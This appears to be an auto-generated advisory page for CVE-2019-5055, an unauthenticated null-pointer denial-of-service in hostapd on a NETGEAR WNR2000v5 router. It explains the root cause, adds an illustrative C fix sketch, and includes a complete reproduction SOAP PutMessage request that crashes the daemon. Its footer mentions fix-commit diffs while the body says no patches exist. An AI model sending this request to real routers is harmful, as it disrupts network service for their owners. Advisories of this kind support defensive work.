CVE-2019-5055
Description
An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5 with Firmware Version V1.0.0.70) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.
Affected products: 1
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing validation to ensure M1 data has been received via GetDeviceInfo() before wps_process_msg() is called, allowing a null pointer dereference."
Attack vector
An unauthenticated attacker sends a specially-crafted SOAP POST request to the <WFAWLANConfig:1#PutMessage> service on the router's hostapd daemon (port 49152) [ref_id=1]. The request triggers a call to wps_process_msg() with a null pointer because the prerequisite GetDeviceInfo() method was never called to populate the required data structure [ref_id=1]. This results in a null pointer dereference [CWE-476] and crashes the hostapd service, causing a denial of service [ref_id=1].
Affected code
The vulnerable code path is in web_connection_check_data() at address 0x44e5dc, which calls wps_process_msg() (at 0x43cc7c) without validating that the M1 data structure has been populated [ref_id=1]. The crash occurs at wps_process_msg+0 when it dereferences a null pointer in register a0 [ref_id=1].
What the fix does
The advisory does not include a patch or specific remediation code [ref_id=1]. The vulnerability is caused by the lack of validation in web_connection_check_data() to verify that M1 data has been received via GetDeviceInfo() before calling wps_process_msg() [ref_id=1]. A proper fix would add a check to ensure the required structure is non-null before passing it to wps_process_msg(), or enforce the correct SOAP method sequence so that PutMessage cannot be called before GetDeviceInfo [ref_id=1].
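A minimal C sketch of the check described above, added here as an illustration and not taken from NETGEAR's firmware, hostapd or the advisory. The struct layout, handler names and status codes are hypothetical, and process_msg() stands in for wps_process_msg().

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical model of the daemon's WPS UPnP state; not hostapd's real structures. */
struct m1_data { unsigned char buf[64]; size_t len; };
struct wps_upnp_state { struct m1_data *m1; /* NULL until GetDeviceInfo has run */ };
enum soap_status { SOAP_OK = 0, SOAP_ERR_INVALID_SEQUENCE = 1, SOAP_ERR_INVALID_ARG = 2 };

/* Stand-in for wps_process_msg(): dereferences its first argument unconditionally. */
static size_t process_msg(const struct m1_data *m1, const unsigned char *msg, size_t msg_len)
{
    (void)msg;
    return m1->len + msg_len;
}

/* GetDeviceInfo handler: populates the M1 state that PutMessage depends on. */
enum soap_status handle_get_device_info(struct wps_upnp_state *st, struct m1_data *storage)
{
    if (st == NULL || storage == NULL) return SOAP_ERR_INVALID_ARG;
    memset(storage, 0, sizeof(*storage));
    storage->len = 8;   /* constructed placeholder length for the M1 message */
    st->m1 = storage;
    return SOAP_OK;
}

/* PutMessage handler with the missing validation added before the dereferencing call. */
enum soap_status handle_put_message(struct wps_upnp_state *st, const unsigned char *msg,
                                    size_t msg_len, size_t *out)
{
    if (st == NULL || msg == NULL || out == NULL) return SOAP_ERR_INVALID_ARG;
    if (st->m1 == NULL) return SOAP_ERR_INVALID_SEQUENCE; /* GetDeviceInfo not called yet */
    *out = process_msg(st->m1, msg, msg_len);
    return SOAP_OK;
}

int main(void)
{
    struct wps_upnp_state st = { NULL };
    struct m1_data m1;
    size_t out = 0;
    const unsigned char msg[] = "AAAA";   /* constructed sample input */
    printf("before GetDeviceInfo: %d\n", handle_put_message(&st, msg, 4, &out));
    handle_get_device_info(&st, &m1);
    printf("after GetDeviceInfo:  %d\n", handle_put_message(&st, msg, 4, &out));
    return 0;
}
```

Returning an explicit sequence error keeps the daemon running and gives the SOAP layer something to report back instead of crashing.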
Preconditions
- auth: No authentication required
- network: Attacker must be able to reach the router's hostapd service on port 49152
- input: The GetDeviceInfo() method must not have been called since the daemon started (default state)
Reproduction
Send the following SOAP POST request to the router at port 49152:
```
POST /wps_control HTTP/1.1
SOAPAction: "urn:schemas-wifialliance-org:service:WFAWLANConfig:1#PutMessage"
Host: 192.168.1.1:49152
Content-Type: text/xml
Content-Length: 357

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
.<m:PutMessage xmlns:m="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewInMessage>AAAA</NewInMessage>
.</m:PutMessage>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```
This causes a null pointer dereference in wps_process_msg(), crashing the hostapd service [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. talosintelligence.com/vulnerability_reports/TALOS-2019-0832 (mitre, x_refsource_MISC)